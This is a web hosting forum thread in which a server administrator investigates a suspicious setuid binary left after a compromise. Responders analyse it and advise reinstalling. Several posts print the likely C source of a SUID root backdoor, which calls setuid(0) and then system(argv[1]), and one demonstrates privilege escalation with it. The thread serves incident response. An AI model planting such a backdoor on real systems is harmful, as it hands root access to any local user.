Results 1 to 21 of 21
  1. #1
    Join Date
    Sep 2011
    Posts
    40

    strange executable

    Recently, one of my servers is compromised through some security hole in a php script (note: the server is running suPHP). I cleaned up the server but did not reinstall it. However, there is this file on the server - /usr/bin/grscnfg which I couldn't find any reference on the internet. This file has the permission set to -rwsr-xr-x so basically any user can run it. Is this something to worry about or is this a normal file? The ctime stat on the file is around the time when the server is compromised. I uploaded this file on virustotal and it's clean...

    Any suggestions on what to do? Should I delete the file? Any advice would be greatly appreciated, thanks!
    Last edited by tonytz; 11-17-2013 at 07:20 PM.

  2. #2
    Join Date
    Nov 2013
    Posts
    103
    Code:
    yum whatprovides '/usr/bin/grscnfg'
    Also check what it is, a binary or a script with

    Code:
    file /usr/bin/grscnfg
    And by the way, the only way to be sure is to wipe and reinstall the server. There are plenty of malware scripts and binaries that aren't flagged by virus or malware checkers, including rootkits.

    If you don't want to nuke the server I guess the "best" you can do is bring it to a rescue mode (as long as it doesn't boot from the server's own hdd) and do a thorough scan with various tools.

  3. #3
    Join Date
    Sep 2011
    Posts
    40
    Yum whatprovides show that there is no matches. Similarly, it doesn't belong to any package according to rpm, so I just gzipped it and moved it to another folder. Not sure if this is useful to do at this stage - I reviewed the output of rpm -Va and nothing suspicious came up.

    I really don't want to re-install the server but looks like it have to be done eventually. The attacker could potentially have gained root after the php script compromise, given that the server wasn't kept update with the patches.

    Regardless, thanks very much for the tips.


    Quote Originally Posted by wndml View Post
    Code:
    yum whatprovides '/usr/bin/grscnfg'
    Also check what it is, a binary or a script with

    Code:
    file /usr/bin/grscnfg
    And by the way, the only way to be sure is to wipe and reinstall the server. There are plenty of malware scripts and binaries that aren't flagged by virus or malware checkers, including rootkits.

    If you don't want to nuke the server I guess the "best" you can do is bring it to a rescue mode (as long as it doesn't boot from the server's own hdd) and do a thorough scan with various tools.

  4. #4
    Join Date
    Apr 2011
    Location
    Melbourne
    Posts
    93
    You could try running the strings program over it to see if there is any hard coded error messages, callbacks, HTTP endpoints. Just note this won't do much if the binary has any level of obfuscation or encryption.

    Code:
    strings /usr/bin/grscnfg

  5. #5
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Would you be willing to send it to me?
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  6. #6
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by ketan View Post
    You could try running the strings program over it to see if there is any hard coded error messages, callbacks, HTTP endpoints. Just note this won't do much if the binary has any level of obfuscation or encryption.

    Code:
    strings /usr/bin/grscnfg
    Here is the entire string output, though not sure what to make of it

    [root@server src]# strings grscnfg
    /lib64/ld-linux-x86-64.so.2
    fff.
    fffff.
    l$ L
    t$(L
    |$0H
    yjN:
    0zjN:
    __gmon_start__
    libc.so.6
    setuid
    system
    setgid
    __libc_start_main
    GLIBC_2.2.5
    /lib64/ld-linux-x86-64.so.2

  7. #7
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    Would you be willing to send it to me?
    sure, please let me know where you prefer the gzip of the file to be sent. thanks

  8. #8
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    steve@rack911.com

    From your strings output it looks like a SUID shell which would mean you were root compromised.

    Send it to me and I will confirm.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  9. #9
    Join Date
    Apr 2011
    Location
    Melbourne
    Posts
    93
    Quote Originally Posted by tonytz View Post
    setuid
    system
    setgid
    Steven beat me to it, but those 3 system calls there would indicate it is a shell that runs as root.

    It's probably something as simple as

    PHP Code:
    int main (int argcchar *argv[])
    {
       
    setuid(0);
       
    setgid(0);
       
    system(argv[1]);

       return 
    0;

    If there is one, there could be more. Would definitely look into reinstalling from scratch.

  10. #10
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    For onlookers to this thread this is definitely a malicious file.

    As you can see I am logged in as user steven:

    steven@steven.com [~]# id
    uid=501(steven) gid=502(steven) groups=502(steven)
    steven@steven.com [~]#
    I can escalate to root.

    steven@steven.com [~]# grscnfg id
    uid=0(root) gid=0(root) groups=0(root),502(steven)
    steven@steven.com [~]#
    Nov 18 19:37:09 cpanel snoopy[7517]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/grscnfg]: grscnfg id
    Nov 18 19:37:09 cpanel snoopy[7518]: [uid:0 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/id]: id
    Typical SUID shell.
    It starts off as user:

    7988 0000/0502 execve("/usr/bin/grscnfg", ["/usr/bin/grscnfg", "id"], [/* 25 vars */]) = 0
    Escalates to root (our patch wont catch the UID change in current form through a suid file, only group but this gives you the idea.):

    7988 0000/0502 setgid(0) = 0
    7988 0000/0000 setuid(0) = 0
    Runs the argument as root.

    7989 0000/0000 execve("/bin/sh", ["sh", "-c", "id"], [/* 25 vars */]) = 0
    7989 0000/0000 execve("/usr/bin/id", ["id"], [/* 25 vars */]) = 0


    Definitely rooted.

    I would see if your openssh packages are compromised aswell.
    Last edited by Steven; 11-18-2013 at 08:52 PM.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  11. #11
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Quote Originally Posted by ketan View Post
    Steven beat me to it, but those 3 system calls there would indicate it is a shell that runs as root.

    It's probably something as simple as

    PHP Code:
    int main (int argcchar *argv[])
    {
       
    setuid(0);
       
    setgid(0);
       
    system(argv[1]);

       return 
    0;


    If there is one, there could be more. Would definitely look into reinstalling from scratch.
    That is exactly the code most likely, its really common.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  12. #12
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by ketan View Post
    Steven beat me to it, but those 3 system calls there would indicate it is a shell that runs as root.

    It's probably something as simple as

    PHP Code:
    int main (int argcchar *argv[])
    {
       
    setuid(0);
       
    setgid(0);
       
    system(argv[1]);

       return 
    0;

    If there is one, there could be more. Would definitely look into reinstalling from scratch.
    Ok, this is bad...looks like a long work day ahead of me. Thanks for explaining this!

  13. #13
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    For onlookers to this thread this is definitely a malicious file.

    As you can see I am logged in as user steven:



    I can escalate to root.





    Typical SUID shell.
    It starts off as user:



    Escalates to root (our patch wont catch the UID change in current form through a suid file, only group but this gives you the idea.):



    Runs the argument as root.





    Definitely rooted.

    I would see if your openssh packages are compromised aswell.
    Steve, thank you very much for looking into this. This pretty much confirms the worst that could possibly happen to my server. What do you propose the best course of action is now? Please see my email also.

  14. #14
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Quote Originally Posted by tonytz View Post
    Steve, thank you very much for looking into this. This pretty much confirms the worst that could possibly happen to my server. What do you propose the best course of action is now? Please see my email also.
    Os reinstall
    Secure the server
    Restore clean backups (if you have them).

    There is also the possibility of these being inside accounts, so don't blindly rsync stuff over.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  15. #15
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    Os reinstall
    Secure the server
    Restore clean backups (if you have them).

    There is also the possibility of these being inside accounts, so don't blindly rsync stuff over.
    Will do. Just ordered a new server and will set it up today.

    Thank you all to everyone who responded to this thread!

  16. #16
    Join Date
    Nov 2013
    Posts
    103
    Quote Originally Posted by Steven View Post
    Escalates to root
    How? Kernel vuln?

  17. #17
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681

    *

    Quote Originally Posted by wndml View Post
    How? Kernel vuln?
    The binary has suid bit set.
    They got hacked some other way and this is a backdoor.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  18. #18
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    I would see if your openssh packages are compromised aswell.
    Just checked (the package for /usr/libexec/openssh):
    rpm -V openssh-5.3p1-20.el6.x86_64

    The command returned no output. Based on this, is it safe to assume that openssh packages are not compromised?

  19. #19
    Join Date
    Apr 2011
    Location
    Melbourne
    Posts
    93
    RPM only produces output if there is a verification failure, so I would hazard a guess that your SSHd hasn't been compromised. Better to be safe then sorry though.

  20. #20
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by ketan View Post
    RPM only produces output if there is a verification failure, so I would hazard a guess that your SSHd hasn't been compromised. Better to be safe then sorry though.
    ya, just to be on the safe side, I am preparing/setting up a new server right now but not disconnecting the old one yet until the new one is ready for a smooth transfer - hopefully by the end of next morning

  21. #21
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    That is a really old rpm package.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

Similar Threads

  1. Resource and Executable
    By mixmox in forum Hosting Security and Technology
    Replies: 2
    Last Post: 08-02-2011, 08:54 AM
  2. Website from executable only ?
    By Lebanon in forum Programming Discussion
    Replies: 5
    Last Post: 07-22-2007, 11:53 AM
  3. C++ compiler cannot create executable
    By guest3 in forum Hosting Security and Technology
    Replies: 2
    Last Post: 01-21-2007, 07:28 AM
  4. Linux Executable
    By hostbox in forum Programming Discussion
    Replies: 4
    Last Post: 10-17-2004, 09:12 PM
  5. php non-executable?
    By Mexico Joe in forum Hosting Security and Technology
    Replies: 2
    Last Post: 04-20-2003, 04:34 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •